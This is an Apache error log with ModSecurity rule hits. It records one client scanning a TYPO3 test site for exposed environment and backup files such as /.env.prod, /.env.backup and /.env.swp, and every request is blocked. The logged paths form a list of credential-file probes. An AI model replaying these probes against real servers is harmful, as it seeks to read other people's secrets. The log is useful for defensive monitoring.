[Fri Nov 21 10:12:33.412674 2025] [:error] [pid 224165] [client 15.223.224.122:35922] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aSAtASF2CK_vLyoVI-2EQgAAAA0"]
[Fri Nov 21 10:12:33.412917 2025] [:error] [pid 224165] [client 15.223.224.122:35922] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aSAtASF2CK_vLyoVI-2EQgAAAA0"]
[Fri Nov 21 10:12:33.413092 2025] [:error] [pid 224165] [client 15.223.224.122:35922] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aSAtASF2CK_vLyoVI-2EQgAAAA0"]
[Fri Nov 21 10:12:37.487363 2025] [:error] [pid 224164] [client 15.223.224.122:37508] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aSAtBXwkd7Eed7ZXqoT4eQAAAAw"]
[Fri Nov 21 10:12:37.487577 2025] [:error] [pid 224164] [client 15.223.224.122:37508] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aSAtBXwkd7Eed7ZXqoT4eQAAAAw"]
[Fri Nov 21 10:12:37.487749 2025] [:error] [pid 224164] [client 15.223.224.122:37508] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aSAtBXwkd7Eed7ZXqoT4eQAAAAw"]
[Fri Nov 21 10:12:37.585422 2025] [:error] [pid 223955] [client 15.223.224.122:37550] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aSAtBTEUbh-dzxMTkK_x5QAAAAM"]
[Fri Nov 21 10:12:37.585633 2025] [:error] [pid 223955] [client 15.223.224.122:37550] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aSAtBTEUbh-dzxMTkK_x5QAAAAM"]
[Fri Nov 21 10:12:37.585809 2025] [:error] [pid 223955] [client 15.223.224.122:37550] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aSAtBTEUbh-dzxMTkK_x5QAAAAM"]
[Fri Nov 21 10:12:38.113844 2025] [:error] [pid 224163] [client 15.223.224.122:37844] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aSAtBo-vpBn5AqkyjcS1FQAAAAs"]
[Fri Nov 21 10:12:38.114107 2025] [:error] [pid 224163] [client 15.223.224.122:37844] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aSAtBo-vpBn5AqkyjcS1FQAAAAs"]
[Fri Nov 21 10:12:38.114367 2025] [:error] [pid 224163] [client 15.223.224.122:37844] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aSAtBo-vpBn5AqkyjcS1FQAAAAs"]
[Fri Nov 21 10:12:38.233665 2025] [:error] [pid 224149] [client 15.223.224.122:37828] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aSAtBssPY-oBfuAti3FYwAAAAAU"]
[Fri Nov 21 10:12:38.233897 2025] [:error] [pid 224149] [client 15.223.224.122:37828] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aSAtBssPY-oBfuAti3FYwAAAAAU"]
[Fri Nov 21 10:12:38.234110 2025] [:error] [pid 224149] [client 15.223.224.122:37828] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aSAtBssPY-oBfuAti3FYwAAAAAU"]
[Fri Nov 21 10:12:41.745350 2025] [:error] [pid 223952] [client 15.223.224.122:39792] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aSAtCZIgILTHWk6gdY_zVAAAAAA"]
[Fri Nov 21 10:12:41.745566 2025] [:error] [pid 223952] [client 15.223.224.122:39792] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aSAtCZIgILTHWk6gdY_zVAAAAAA"]
[Fri Nov 21 10:12:41.745757 2025] [:error] [pid 223952] [client 15.223.224.122:39792] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aSAtCZIgILTHWk6gdY_zVAAAAAA"]
[Fri Nov 21 10:12:41.767890 2025] [:error] [pid 223954] [client 15.223.224.122:39794] [client 15.223.224.122] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aSAtCYPLQdWysfkg-aEJ_wAAAAI"]
[Fri Nov 21 10:12:41.768040 2025] [:error] [pid 223954] [client 15.223.224.122:39794] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aSAtCYPLQdWysfkg-aEJ_wAAAAI"]
[Fri Nov 21 10:12:41.768236 2025] [:error] [pid 223954] [client 15.223.224.122:39794] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aSAtCYPLQdWysfkg-aEJ_wAAAAI"]
[Fri Nov 21 10:12:41.768389 2025] [:error] [pid 223954] [client 15.223.224.122:39794] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aSAtCYPLQdWysfkg-aEJ_wAAAAI"]
[Fri Nov 21 10:12:41.802308 2025] [authz_core:error] [pid 224162] [client 15.223.224.122:39806] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env~
[Fri Nov 21 10:12:42.390074 2025] [:error] [pid 223953] [client 15.223.224.122:40122] [client 15.223.224.122] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aSAtCj27u3u2us0kkkbx_QAAAAE"]
[Fri Nov 21 10:12:42.390261 2025] [:error] [pid 223953] [client 15.223.224.122:40122] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aSAtCj27u3u2us0kkkbx_QAAAAE"]
[Fri Nov 21 10:12:42.390482 2025] [:error] [pid 223953] [client 15.223.224.122:40122] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aSAtCj27u3u2us0kkkbx_QAAAAE"]
[Fri Nov 21 10:12:42.390646 2025] [:error] [pid 223953] [client 15.223.224.122:40122] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aSAtCj27u3u2us0kkkbx_QAAAAE"]
[Fri Nov 21 10:12:42.509171 2025] [:error] [pid 224157] [client 15.223.224.122:40070] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "aSAtChwVZ0k-ldSnL4rj-wAAAAY"]
[Fri Nov 21 10:12:42.509415 2025] [:error] [pid 224157] [client 15.223.224.122:40070] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "aSAtChwVZ0k-ldSnL4rj-wAAAAY"]
[Fri Nov 21 10:12:42.509640 2025] [:error] [pid 224157] [client 15.223.224.122:40070] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "aSAtChwVZ0k-ldSnL4rj-wAAAAY"]
[Fri Nov 21 10:12:46.108016 2025] [authz_core:error] [pid 224165] [client 15.223.224.122:42006] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.bak
[Fri Nov 21 10:12:46.877594 2025] [authz_core:error] [pid 224164] [client 15.223.224.122:42054] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.swp
[Fri Nov 21 10:12:47.167753 2025] [:error] [pid 223955] [client 15.223.224.122:42034] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aSAtDzEUbh-dzxMTkK_x5gAAAAM"]
[Fri Nov 21 10:12:47.167951 2025] [:error] [pid 223955] [client 15.223.224.122:42034] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aSAtDzEUbh-dzxMTkK_x5gAAAAM"]
[Fri Nov 21 10:12:47.168130 2025] [:error] [pid 223955] [client 15.223.224.122:42034] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aSAtDzEUbh-dzxMTkK_x5gAAAAM"]
[Fri Nov 21 10:12:47.199894 2025] [:error] [pid 224163] [client 15.223.224.122:42068] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.orig"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.orig"] [unique_id "aSAtD4-vpBn5AqkyjcS1FgAAAAs"]
[Fri Nov 21 10:12:47.200104 2025] [:error] [pid 224163] [client 15.223.224.122:42068] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.orig"] [unique_id "aSAtD4-vpBn5AqkyjcS1FgAAAAs"]
[Fri Nov 21 10:12:47.200287 2025] [:error] [pid 224163] [client 15.223.224.122:42068] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.orig"] [unique_id "aSAtD4-vpBn5AqkyjcS1FgAAAAs"]
[Fri Nov 21 10:12:47.807717 2025] [:error] [pid 224149] [client 15.223.224.122:42668] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.tmp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.tmp"] [unique_id "aSAtD8sPY-oBfuAti3FYwQAAAAU"]
[Fri Nov 21 10:12:47.808778 2025] [:error] [pid 224149] [client 15.223.224.122:42668] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.tmp"] [unique_id "aSAtD8sPY-oBfuAti3FYwQAAAAU"]
[Fri Nov 21 10:12:47.808990 2025] [:error] [pid 224149] [client 15.223.224.122:42668] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.tmp"] [unique_id "aSAtD8sPY-oBfuAti3FYwQAAAAU"]
[Fri Nov 21 10:12:51.296924 2025] [authz_core:error] [pid 223952] [client 15.223.224.122:44382] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.dist
[Fri Nov 21 10:12:51.320101 2025] [authz_core:error] [pid 223953] [client 15.223.224.122:44392] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/admin
